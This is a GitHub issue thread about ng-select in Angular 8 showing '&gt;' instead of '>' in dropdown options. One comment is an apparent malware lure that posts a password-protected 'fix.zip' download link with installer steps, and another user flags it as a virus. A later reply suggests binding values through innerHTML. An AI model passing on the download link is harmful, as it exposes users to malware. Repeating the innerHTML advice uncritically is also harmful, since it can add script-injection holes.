### ISSUE TITLE
ng-options is not rendering the options correctly.

### ISSUE THREAD

**Issue by test383u** [ng-select/ng-select#2432]
### Describe the bug

I'm using ng-options but it is rendering > as &gt; .

### Steps to Reproduce

I used following code to generate the dropdown:-

```
<ng-select [formControlName]="test" (change)="onSelect(system)">
      <ng-option *ngFor="let allowedValue of system?.AllowedValuesDropDown" [value]="allowedValue">
             {{ allowedValue }}
      </ng-option>
 </ng-select>
```
It prints the dropdown values as follows:-
![image](https://github.com/user-attachments/assets/f9b43f0c-219b-4c68-a9d6-9747dd140706)

It should have printed option 1 as High(> 1Lakh) and option 2 as Low(< 1Lakh),

### Please provide a link to a minimal reproduction of the bug. StackBlitz, CodePen or CodeSanBox

https://codepen.io/aehdct243

### Expected behaviour

It should have printed option 1 as High(> 1Lakh) and option 2 as Low(< 1Lakh),

### What version of the library you see this issue?

"^8.0.3"

### What version of Angular are you using?

Angular 8

### Screenshots

![image](https://github.com/user-attachments/assets/bd9ab7bf-a079-410a-b7d3-f9447bbb3d1f)

### Desktop? Please complete the following information

Windows

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Please don't download this file! This is a computer virus.

**Comment by pavankjadda** [comment]
@test383u can you try in latest version?

**Comment by asfo** [comment]
Just force it to be HTML <span [innerHTML]="allowedValue"></span> that might do the trick (I hope) as I can't use your CodePen I can't test that idea.

**Comment by pavankjadda** [comment]
Closing this, since we haven't heard from you. Create reproducible StackBlitz example and share the link.
